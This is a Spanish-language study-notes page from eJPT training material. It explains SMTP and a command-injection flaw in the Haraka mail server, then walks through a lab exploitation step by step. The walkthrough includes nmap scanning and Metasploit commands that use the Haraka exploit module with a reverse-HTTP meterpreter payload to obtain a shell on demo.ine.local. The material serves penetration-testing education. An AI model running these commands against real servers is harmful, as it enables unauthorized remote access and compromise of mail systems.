> For the complete documentation index, see [llms.txt](https://4lec4st.gitbook.io/4lec4st/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://4lec4st.gitbook.io/4lec4st/ejpt-notes/pruebas-de-penetracion-de-host-y-red/metasploit-framework-msf/explotacion/explotacion-de-linux/explotacion-de-un-servidor-smtp-vulnerable.md).

# Explotación de un servidor SMTP vulnerable

### 📬 ¿Qué es SMTP?

**SMTP (Simple Mail Transfer Protocol)** es un protocolo de comunicación utilizado para la **transmisión de correos electrónicos** entre servidores y clientes de correo electrónico.

* Por defecto, SMTP se comunica a través del **puerto TCP 25**.
* También puede configurarse para usar los puertos **TCP 465** (SSL) y **587** (STARTTLS), especialmente cuando se requiere cifrado.

***

### 💡 ¿Qué es Haraka?

**Haraka** es un servidor **SMTP de alto rendimiento y código abierto**, desarrollado en **Node.js**.

* Está diseñado para ser **modular y personalizable**, ideal para servidores de correo de gran volumen.
* Haraka incluye varios plugins que extienden su funcionalidad, incluyendo uno específico para el **procesamiento de archivos adjuntos**.

***

### 🚨 Vulnerabilidad en Haraka (CVE no especificado)

Las versiones de **Haraka anteriores a la v2.8.9** son vulnerables a una **inyección de comandos**.

#### 🔥 Detalles de la vulnerabilidad:

* La falla se encuentra en el **plugin que maneja los archivos adjuntos**.
* Un atacante puede enviar un correo especialmente manipulado que aprovecha el proceso de manejo de adjuntos para **inyectar comandos en el sistema** que ejecuta Haraka.
* Esta vulnerabilidad permite la **ejecución remota de comandos (RCE)** si se explota con éxito.

***

## 🧪 Laboratorio Práctico

**Paso 1:** Abra el enlace del laboratorio para acceder a la máquina Kali.

<figure><img src="/files/eMoociL43h7PDxetVyEg" alt=""><figcaption></figcaption></figure>

**Paso 2:** Verifique si la máquina de destino es accesible:

**Dominio:**

```
ping -c 4 demo.ine.local
```

<figure><img src="/files/MwiGCCrkU97xS4YYlGNx" alt=""><figcaption></figcaption></figure>

El objetivo es alcanzable.

**Paso 3:** Ejecute un escaneo nmap contra el objetivo:

**Dominio:**

```
nmap -sS -sV demo.ine.local
```

<figure><img src="/files/CL5tQPESVZccETofoKWL" alt=""><figcaption></figcaption></figure>

**Paso 4:** Hemos descubierto un servidor Haraka ejecutándose en la máquina objetivo. Usemos el módulo Metasploit para explotar el objetivo.

Antes de eso, asegúrese de iniciar el servicio de base de datos postgresql:

**Dominio:**

```
service postgresql start
```

<figure><img src="/files/nyS2tGYjlNL69pstG0YO" alt=""><figcaption></figcaption></figure>

Ahora, ejecute los siguientes comandos:

Asegúrese de reemplazar el valor LHOST con la dirección IP de su máquina Kali.

**Comandos:**

```
msfconsole -q

use exploit/linux/smtp/haraka
set SRVPORT 9898
set email_to root@attackdefense.test
set payload linux/x64/meterpreter_reverse_http
set rhost demo.ine.local
set LHOST 192.164.31.2
exploit
```

<figure><img src="/files/ZkPhdb8IB6nEitPagxBm" alt=""><figcaption></figcaption></figure>

**Ignore cualquier error** que vea, ya que ya ha obtenido la sesión de meterpreter. Para listar las sesiones activas, ejecute el siguiente comando:

**Dominio:**

```
sessions 
```

<figure><img src="/files/tZY1moA2VL1krpTKFDfh" alt=""><figcaption></figcaption></figure>

Para interactuar con esta sesión, ejecute el siguiente comando:

**Dominio:**

```
sessions -i 1
```

<figure><img src="/files/av9ynE84eVPEvJEoWVek" alt=""><figcaption></figcaption></figure>

#### Conclusión

En este laboratorio, explotamos un servidor SMTP vulnerable usando un módulo Metasploit para obtener acceso al shell en el objetivo.

#### Referencias

* <https://haraka.github.io/>
* <https://www.rapid7.com/db/modules/exploit/linux/smtp/haraka>
* <https://www.exploit-db.com/exploits/41162>
